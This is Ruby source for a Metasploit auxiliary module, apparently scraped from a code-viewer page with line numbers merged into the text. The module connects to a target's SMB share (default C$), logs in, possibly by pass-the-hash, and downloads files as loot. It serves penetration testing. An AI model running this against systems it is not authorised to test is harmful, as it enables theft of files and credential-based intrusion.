Path: blob/master/modules/auxiliary/admin/smb/download_file.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary67# Exploit mixins should be called first8include Msf::Exploit::Remote::SMB::Client9include Msf::Exploit::Remote::SMB::Client::Authenticated10include Msf::Exploit::Remote::SMB::Client::RemotePaths11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner13include Msf::OptionalSession::SMB1415def initialize16super(17'Name' => 'SMB File Download Utility',18'Description' => %(19This module downloads a file from a target share and path. The usual reason20to use this module is to work around limitations in an existing SMB client that may not21be able to take advantage of pass-the-hash style authentication.22),23'Author' => [24'mubix' # copied from hdm upload_file module25],26'License' => MSF_LICENSE,27'Notes' => {28'Stability' => [CRASH_SAFE],29'SideEffects' => [],30'Reliability' => []31}32)3334register_options([35OptString.new('SMBSHARE', [true, 'The name of a share on the RHOST', 'C$'])36])37end3839def smb_download40vprint_status('Connecting...')41if session4243print_status("Using existing session #{session.sid}")44self.simple = session.simple_client45else46connect47smb_login48end4950vprint_status("Mounting the remote share \\\\#{simple.address}\\#{datastore['SMBSHARE']}'...")51simple.connect("\\\\#{simple.address}\\#{datastore['SMBSHARE']}")5253remote_paths.each do |remote_path|54vprint_status("Trying to download #{remote_path}...")5556data = ''57fd = simple.open(remote_path.to_s, 'o')58begin59data = fd.read60ensure61fd.close62end6364fname = remote_path.split('\\')[-1]65path = store_loot('smb.shares.file', 'application/octet-stream', rhost, data, fname)66print_good("#{remote_path} saved as: #{path}")67rescue Rex::Proto::SMB::Exceptions::ErrorCode => e68elog("Unable to download #{remote_path}:", error: e)69print_error("Unable to download #{remote_path}: #{e.message}")70end71end7273def run_host(_ip)74validate_rpaths!7576begin77smb_download78rescue Rex::Proto::SMB::Exceptions::LoginError => e79elog("Unable to login: #{e.message}", error: e)80print_error("Unable to login: #{e.message}")81end82end83end848586